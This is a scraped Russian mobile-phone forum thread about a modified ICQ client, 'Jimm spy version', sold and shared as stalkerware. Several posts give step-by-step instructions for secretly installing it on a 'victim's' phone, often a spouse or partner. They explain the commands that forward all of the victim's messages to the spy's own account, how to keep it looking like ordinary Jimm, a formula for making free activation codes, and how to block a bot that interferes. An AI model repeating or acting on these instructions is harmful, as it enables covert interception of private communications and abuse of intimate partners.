gajer, бери :)
![]() Jimm - Шпионская Версия !, spy on wife, enemys etc... :))) |
![]() |
![]() |
![]() |
![]() |
![]() |
Здравствуйте, гость ( Вход | Регистрация ) |
![]() Jimm - Шпионская Версия !, spy on wife, enemys etc... :))) |
DjSens |
![]() |
|
Опытный ![]() ![]() ![]() Группа: Пользователи Сообщений: 121 Регистрация: 13.6.2005 Пользователь №: 44 121 Модель телефона: Motor_C650 Рейтинг: 64 ![]() |
gajer, бери :)
| |
gajer |
![]() |
![]() Новичок ![]() Группа: Пользователи Сообщений: 14 Регистрация: 22.8.2006 Пользователь №: 95 972 Модель телефона: С380 Рейтинг: 0 ![]() |
а можно узнать какое максимальное количество пользователей может "обслуживать" программка. Уж очень заинтересовала эта темка)
|
DjSens |
![]() |
Опытный ![]() ![]() ![]() Группа: Пользователи Сообщений: 121 Регистрация: 13.6.2005 Пользователь №: 44 121 Модель телефона: Motor_C650 Рейтинг: 64 ![]() |
gajer, программе пофигу количество клиентов - главное чтоб железо выдержало :)
|
Greeder |
![]() |
Новичок ![]() Группа: Пользователи Сообщений: 2 Регистрация: 10.1.2007 Пользователь №: 115 981 Модель телефона: v3i Рейтинг: 0 ![]() |
Spy Jimm заработал, но есть одно НО.
Если подруга со своим Spy Jimm отправляется сообщение прямо на твой UIN - ничего не приходит почему-то. Если любому другому - копия доходит нормально. |
SirJohn |
![]() |
![]() Новичок ![]() Группа: Пользователи Сообщений: 23 Регистрация: 1.11.2006 Пользователь №: 105 650 Модель телефона: MOT l7 Прошивка: R4513_G_08.B7.AER_RB Рейтинг: 1 ![]() |
В офлайне может храниться максимум 40 сообщений
Если нужно держать номер постоянно в сети и записывать историю пишите мне, я могу помочь за скромную плату |
DjSens |
![]() |
1. специально для мотофанов - у кого тут рейтинг больше 30 получают шпиёна бесплатно !
(оставляю за собой право изменить этот порог =) 2. учитывая наличие бесплатных программ типа ICQMsgLogger я не понимаю претензий к платности шпиёна... - ставьте логгер и шпиёнте нахаляву =) 1. скачиваем spy jimm по адресу (пишу с пробелами, чтоб яндекс не нашёл): j i m m s . wen.ru или j i m m s . ucoz.ru 2. Ставим ЖЕРТВЕ НА СОТИК Spy Jimm. Старый стерев сначала. 3. Потом жертве отправляем по аське без кавычек "+NNNNNN" где NNNNNN - это ваш номер аськи (туда джимм будет дублировать всю переписку жертвы) 4. Через 5 запусков джимм перестанет шпионить если не послать жертве платный код. Код активации привязан к номеру аськи хозяина. Отправлять код надо жертве только с того номера, к которому привязан код, иначе не сработает. Код не меняется при выходе новых версий шпиёна. Код можно послать нескольким жертвам. Сообщение отредактировал DjSens - 15.4.2008, 8:16 |
fokus.46 |
![]() |
![]() Новичок ![]() Группа: Пользователи Сообщений: 15 Регистрация: 17.9.2006 Из: Железногорск Пользователь №: 99 472 Модель телефона: Z3 Прошивка: 02.0DR Рейтинг: 0 ![]() |
А можно эту шпионскую версию переделать под какую ни будь новую версию Jimm 0.5.2?
|
Баста |
![]() |
![]() Интересующийся ![]() ![]() Группа: Пользователи Сообщений: 35 Регистрация: 24.10.2006 Пользователь №: 104 605 Модель телефона: Motorola ROKR E1 Прошивка: MotoWalkman Рейтинг: 3.5 ![]() |
Шпионский джим это тупая программа....с помощью которой вы можете лишиться своей аси....то есть вы водити свой номер и пароль...и при подключение к серверу присылается ваш уин и пасс ...на номер который запрограмирован в асе
|
DjSens |
![]() |
и че ж никто не написал что у него номер угнали тогда ?
|
XaTTaB |
![]() |
![]() Ветеран ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 454 Регистрация: 31.1.2005 Пользователь №: 36 210 Модель телефона: E2 Прошивка: The One Рейтинг: 286 ![]() |
ну, наверно, потому, что высказывание Басты есть мягко говоря необоснованный гон :-) на сколько я знаю, шпион предназначен совсе для других целей, а не для банального угона паролей... кстати, угон пароля по сравнению с возможными последствиями использования шпиона на телефоне жертвы - это детский лепет ;-)
|
Simpleton |
![]() |
Интересующийся ![]() ![]() Группа: Пользователи Сообщений: 78 Регистрация: 7.7.2006 Пользователь №: 90 529 Модель телефона: с380 с650 nokia5130 Прошивка: R365-2.23R -3.08R Рейтинг: 1 ![]() |
вообще респект и DjSens и челу, который это все наваял :-) пользовался первой версией, обязательно соберусь и не пожалею немного деревянных для этого человека. Ну и отдельный плюс за привязку кода к UINу, надеюсь, все же при продаже хучь одним глазком в блэк-листы заглядывают и кому попало не коды не продают :-)
|
Ядерный |
![]() |
![]() Художник ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 295 Регистрация: 11.5.2006 Из: Ростов Пользователь №: 82 730 Модель телефона: HtcDiamond,Love;v360 Прошивка: Touch Flo, Dicar&Sny Рейтинг: 38.6 ![]() |
****1. специально для мотофанов - у кого тут рейтинг больше 30 получают шпиёна бесплатно !
(оставляю за собой право изменить этот порог =)**** Давно наблюдал за темой насчет репы-приятно.как же ее получить? Добавлено позже (15.3.2008, 20:02): *получить шпиона |
Dallas |
![]() |
Новичок ![]() Группа: Пользователи Сообщений: 9 Регистрация: 22.6.2005 Пользователь №: 44 705 Модель телефона: RAZR2 V9 Прошивка: 263313008 Рейтинг: 0 ![]() |
Спасибо я и заплатить могу )
Добавлено позже (17.3.2008, 13:28): Шпионский джим это тупая программа....с помощью которой вы можете лишиться своей аси....то есть вы водити свой номер и пароль...и при подключение к серверу присылается ваш уин и пасс ...на номер который запрограмирован в асе Баста - это тупой вася, который гонит ничего не проверив |
DjSens |
![]() |
(ARH)665, зачем тебе настройки глючной бесплатной версии которая морально устарела ещё год назад ? (она была 051 кстати)
ты же совершенно бесплатно можешь пользоватся новой (052b от 8 марта 2008г.) В личку или по аське стукни - дам тебе код активации. Сообщение отредактировал DjSens - 26.3.2008, 15:20 |
Lana_ |
![]() |
Новичок ![]() Группа: Пользователи Сообщений: 1 Регистрация: 6.4.2008 Пользователь №: 168 719 Модель телефона: K750i Прошивка: standart Рейтинг: 0 ![]() |
Уважаемый г-н DjSens у меня появилась острая необходимость по шпионить, но к сожалению телефон работает с JAR версиями Jimm'а причом МЧ пользуется только последними версиями "онного" продукта, по гуляв по сети нашла несколько хранителей истории в полне работающих, но проблемма в том что нужно указывать адрес в Jimm'е что бы он подключался через него, (а просто взять его телефон и начать ковыряться в настройках сами понимаете), дак вот если бы как нить смочь исправить дистриб jimm'a то проблем со шпионажем не было бы ни каких))), я не смогла разобраться с j2sdk и с подобными прогами если бы кто то смог была бы очень признательна, возможно в $
Сообщение отредактировал Lana_ - 6.4.2008, 16:21 |
DjSens |
![]() |
Лана, прочитай в этой теме сообщение номер 64 Jimm - Шпионская Версия !
Там ссылка и инструкции Сообщение отредактировал DjSens - 15.4.2008, 8:19 |
Дагестан |
![]() |
![]() Интересующийся ![]() ![]() Группа: Пользователи Сообщений: 79 Регистрация: 31.8.2006 Из: Россия Пользователь №: 97 197 Модель телефона: E1, L7, W510, Z3 Рейтинг: 3.5 ![]() |
А в новой (платной) версии не надо править джад? И нужен ли он вообще?
|
DarK AngeL |
![]() |
![]() Ветеран ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 352 Регистрация: 2.2.2008 Из: Уфа Пользователь №: 162 097 Модель телефона: Nokia E71 & N97 mini Рейтинг: 155 ![]() |
приложение стало платным?! мде....та я нахаляву могу его сделать.....та и исходников с него не требуют....странно как-то всё....
|
DjSens |
![]() |
DarK AngeL, часть денег идёт на дальнейшую модификацию и навороты джимма
Многим шпионский джимм помог узнать про свою "рогатость" и люди не жаловались потом на платность а наоборот говорили что и больше бы не пожалели К тому же никто никого не принуждает - кто не хочет - тот не покупает Кто хочет бесплатно - тот сам ковыряет исходники У кого рейтинг на мотофане больше 30 - тот может бесплатно пользоватся Кто хочет на блюдечке с голубой каёмочкой и ничего не сделал полезного для мотофана - тот платит 150 р. за сервис. |
Diablo™ |
![]() |
![]() on line ![]() ![]() ![]() ![]() ![]() ![]() Группа: Почётные мотофаны Сообщений: 1 144 Регистрация: 23.1.2006 Из: Казань Пользователь №: 66 901 Модель телефона: Samsung s24 ![]() Рейтинг: 952 ![]() |
Поправил первый пост + почистил тему (удалил дискуссию по поводу нарушения GPL).
|
DjSens |
![]() |
aspro, команда +uin срабатывает только 1 раз и только в течении первых 5 запусков после установки джимма. Если кто то послал код, то +uin тоже уже не сработает
джон-нск, я сам таким джиммом не пользуюсь, поэтому потестить не могу. Раньше проверял - вроде нормально всё было. Возможно сотик у жертвы не тянет... (быстродействия проца не хватает) Или жертве отвечают с фигзнаткакой аськи, в нестандартной кодировке... |
джон-нск |
![]() |
![]() Мастер ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 160 Регистрация: 30.10.2005 Из: Новосибирск Пользователь №: 56 491 Модель телефона: HTC TyTN2 Рейтинг: 20.5 ![]() |
сотик тянет 105. а про кодировку-да вроде с джима тоже отправляют.
|
Gandalv |
![]() |
Новичок ![]() Группа: Пользователи Сообщений: 1 Регистрация: 12.8.2008 Пользователь №: 179 030 Модель телефона: nokia 6288 Прошивка: xz Рейтинг: 0 ![]() |
Парни, а возможно и девушки, я конечно не специалист в плане программирования на жабе. Но при прочтении данной тему у меня возник серьезный вопрос: если у вас есть доступ к телефону, чтобы установить на него прогу, то почему вы не можете воспользоваться этим же доступом и просто слить хистори? Или вы не ищите "легких путей"?
Хотя в целом мысль интересная, у самого есть кое какие подозрения ![]() ![]() ![]() |
Komov |
![]() |
Новичок ![]() Группа: Начинающие Сообщений: 2 Регистрация: 23.5.2009 Пользователь №: 200 045 Модель телефона: SE K750 Рейтинг: 0 ![]() |
Добраться до RMS телефона не так то просто, гораздо проще поставить jimm шпион вроде этого. Года полтора назад пробовал уже, не получилось, висла сволоч, в этот раз срослось благо )
|
Komov |
![]() |
Новичок ![]() Группа: Начинающие Сообщений: 2 Регистрация: 23.5.2009 Пользователь №: 200 045 Модель телефона: SE K750 Рейтинг: 0 ![]() |
Забыл сказать, там чтобы он работал, достаточно прописать номер аськи, куда переписку слать. Там для этого беспалевное поле "доп. порт" в настройках сети )
Сообщение отредактировал Komov - 24.5.2009, 11:31 |
FEAR4ik |
![]() |
![]() Гуру ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 727 Регистрация: 1.11.2007 Пользователь №: 152 546 Модель телефона: E398+E1+E2+K1+L9 Настроение: #keef Рейтинг: 1049 ![]() |
|
juifublibriBe |
![]() |
![]() Новичок ![]() Группа: Начинающие Сообщений: 4 Регистрация: 26.6.2009 Из: Romania Пользователь №: 201 916 Модель телефона: Romania Прошивка: juifublibriBe Рейтинг: 0 ![]() |
вчера мне стукнули, попросили выложить jimm на nokia 6230i, которым я пользуюсь - вот я и выложил.
|
CooperOFF |
![]() |
Новичок ![]() Группа: Начинающие Сообщений: 1 Регистрация: 10.5.2010 Пользователь №: 216 867 Модель телефона: n73 Рейтинг: 0 ![]() |
Jimm шпион 0.6.0
Описание: Jimm шпион, 100% рабочий jimm, обладающий уникальной функцией копирования и пересылки сообщений на заданный номер. Внешних отличий с обычным jimm Вы не увидите. Мод основан на версии 0.6.0. Смайлы: анимированные. Телефоны: midp2, почти все модели телефонов. Тестовый режим: 1) Удаляем все старые Jimm с телефона жертвы. 2) Ставим jimm шпион 3) Отсылаем код "+NNNNNNN" (без ковычек, где NNNNNNN - это Ваш номер ICQ, тот куда будет копироваться переписка) 4) Данный код активации работает на 5 запуском jimm, после чего нужно будет ввести постоянный код активации. Принцип работы: 1) Устанавливаем в телефон жертвы 2) Когда жертва заходит с него, отсылаем код активации 3) После этого вся переписка будет приходить на Ваш номер Некоторый команды: ".+" (точка плюс) - включить жпионаж ".-" (точка минус) - временно выключить шпионаж "=)" - проверить с чего сидит жертва. Если со шпиона, то Вам придет уведомление, если нет, жертва получит обычный смайл. Как получить постоянный код активации: 1) Код активации расчитывается индивидуально для каждого номера с которого будут следить 2) Для получения кода Вам необходимо оплатить услугу в размере всего 50 рублей на счет мобильного телефона. 3) Отправить Л.С администратору сайта, в частности мне) с номером ICQ с которого будут следить. Стучим в ICQ 27091987, чтобы узнать номер куда платить 4) После всего проделанного Вы получите Л.С с кодом активации или лично в ICQ. Остальные вопросы: 1) Могут ли следить несколько человек за одной жертвой? Ответ: Нет, не могут 2) Могу ли Я следить за несколькими жертвами? Ответ: Да, можете, принцип работы такой же. Код повторно оплачивать не нужно. Как переделать jimm под нужное мне оформление? Скачиваете Jimm шпион, скачиваете любой другой Jimm версии 0.6.0 с понравившимся или нужным Вам оформлением. Открываете оба .jar-файла с помощью WinRAR. Из нужного Вам архива перекидываете все файлы .png в архив Jimm шпиона. (кроме файла smile.png) При полном или частичном копировании ссылка на источник материала обязательна. Тип лицензии: Условно-бесплатно Язык: Русский Сайт программы: http://v-programme.ru - отзывы читайте на сайте. Скачать P.S.: Администрация, не смог создать новую тему. Перенесите если это необходимо. Добавлено позже (10.5.2010, 20:39): Добраться до RMS телефона не так то просто, гораздо проще поставить jimm шпион вроде этого. Года полтора назад пробовал уже, не получилось, висла сволоч, в этот раз срослось благо ) У нас получилось добраться. Скоро выложу версию с полной выкачкой контакта. Если кому интересны подробности стучите в ICQ 27091987 Добавлено позже (10.5.2010, 20:52): Бсплатный способ слежения за жертвой с помощью Jimm шпиона от DjSens Для установки необходимо: 1) скачать прикрепленный файл; 2) установить в телефон жертвы; 3) обойти систему защиты с помощью бота; 4) с номера на который будет приходить переписка послать жертве уникальный код. Как получить код и как активировать шпионаж? - код можно высчитать по формуле - код привязан к номеру ICQ, на который должна приходить перепись - берем калькулятор в руки и считаем: ФОРМУЛА ХХХХХХХХХ * 2 + 147483647 где: - "ХХХХХХХХХ" - это номер ICQ куда вы хотите, чтобы приходила перепись; - "*" - это умножить... - после того как получилось конечное число берем первые шесть цифр - ЭТО И ЕСТЬ КОД - код отсылается обычным сообщением жертве - код работает если выполнены все условия настройки шпионажа -ГЛАВНОЕ ЧТОБЫ ЖЕРТВА "СИДЕЛА" С ЭТОГО ДЖИММА, А ШПИОНИТЬ МОЖНО С ЛЮБОГО ICQ-клиента!!! Как обойти защиту бота Очень просто, блокируем его естесственным способом, то есть сервером ICQ: 1) добавляем контакт 3102967 жертве в список контактов (обязательно) 2) после довавления заносим его в список игнора и в список невидящих также на телефоне жертвы (обязательно) 3) Если первые два пункта выполнены, то с телефоном жертвы ничего делать больше не нужно. 4) заранее зная на какой номер вы бы хотели получать переписку жертвы, делаем с этим номером аналогичную процедуру. 5) добавляем контак и заносим в списки. На этом часть обхода защиты закончена. Для чего это нужно Контакт 3102967 это бот для отправки СМС и E-MAIL непосредственно из Аськи, ГЛАВНАЯ фишка в том, что Бот придуман для составления базы данных ваших паролей МЫЛ. Если вы дорожите своей приватностью не стоит им пользоваться. Игнор - это приватность сервера ICQ, он блокирует получение сообщений от Нежелательных клиентов. То есть простыми словами беспокоить они вас не будут. К тому же, этот бот будет блокировать организацию шпионажа, то есть будет посылать спам и коды отключения услуги (в игноре ничего сделать не сможет). Источник: http://soft-icq.ru/load/3-1-0-19 Скачать Jimm шпионы для различных телефонов можно там же. В более новых версих Jimm шпиона от Sensa возможно переделана формула. Качайте старые версии или пишите в ICQ я ксажу Вам ее. |
Andreid |
![]() |
Новичок ![]() Группа: Начинающие Сообщений: 1 Регистрация: 21.1.2011 Пользователь №: 222 964 Модель телефона: 5700 Рейтинг: 0 ![]() |
DjSens,
Кругом одни барыги,столько пустых слов и ни одного поста где написано как бесплатно активировать этот Джимм,а то что такая программа есть в интернете и так уже давно все знают... ![]() |
Garm |
![]() |
![]() Гуру ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 1 356 Регистрация: 10.8.2005 Из: Морозовск Пользователь №: 48 276 Модель телефона: a1200e, iXiaomi R3 Pro Прошивка: Black Ming 3b Рейтинг: 250 ![]() |
Andreid, а постом выше Вашего не тот способ?
|
CrashX |
![]() |
![]() Гуру ![]() ![]() ![]() ![]() ![]() ![]() Группа: Пользователи Сообщений: 834 Регистрация: 21.3.2005 Из: Севастополь-Барнаул Пользователь №: 39 257 Модель телефона: Moto MAXX Прошивка: self.custom() Настроение: Овощ в помощь... В смысле ХРЕН С ТОБОЙ Рейтинг: 360 ![]() |
больше чем у верен что это отправка смс идет будьте бдительны у меня знакомая как то поставил себе аску и ткнула в настройки ) он настроился на 3,5 тр
недавно был суд) она выплатила 3,5тр |
![]() ![]() |
Текстовая версия | Сейчас: 30.6.2025, 7:26 |
Форум живёт: